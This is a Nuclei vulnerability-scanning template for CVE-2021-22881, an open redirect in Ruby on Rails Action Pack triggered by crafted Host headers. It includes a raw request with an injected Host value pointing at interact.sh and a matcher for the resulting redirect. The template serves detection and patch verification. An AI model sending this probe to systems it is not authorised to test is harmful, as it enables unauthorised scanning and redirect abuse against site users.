Ruby on Rails action pack before 6.1.2.1, 6.0.3.5 contains an open redirect caused by special crafted Host headers in combination with allowed host formats, letting attackers redirect users to malicious websites, exploit requires attacker to control Host headers.
PoC代码[已公开]
id: CVE-2021-22881
info:
name: Ruby on Rails - Open Redirect via Host Header Injection
author: theamanrawat
severity: medium
description: |
Ruby on Rails action pack before 6.1.2.1, 6.0.3.5 contains an open redirect caused by special crafted Host headers in combination with allowed host formats, letting attackers redirect users to malicious websites, exploit requires attacker to control Host headers.
impact: |
Attackers can redirect users to malicious sites, potentially leading to phishing or malware distribution.
remediation: |
Update to version 6.1.2.1, 6.0.3.5 or later versions.
reference:
- https://hackerone.com/reports/1047447
- https://nvd.nist.gov/vuln/detail/CVE-2021-22881
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-22881
epss-score: 0.11369
epss-percentile: 0.93348
cwe-id: CWE-601
metadata:
verified: false
max-request: 1
tags: cve,cve2021,ruby,rails,host-header,redirect,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: interact.sh#{{randstr}}.{{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
- type: status
condition: or
status:
- 302
- 301
# digest: 490a004630440220252a303ad891d09b2f0789b8d5b4e40d7a5e46b6be924eb777f5ace17daf13b1022003595a8606da4a341ab2dd3847c4820d99681e180e47c82a896f5f0f747a2617:922c64590222798bb761d5b6d8e72950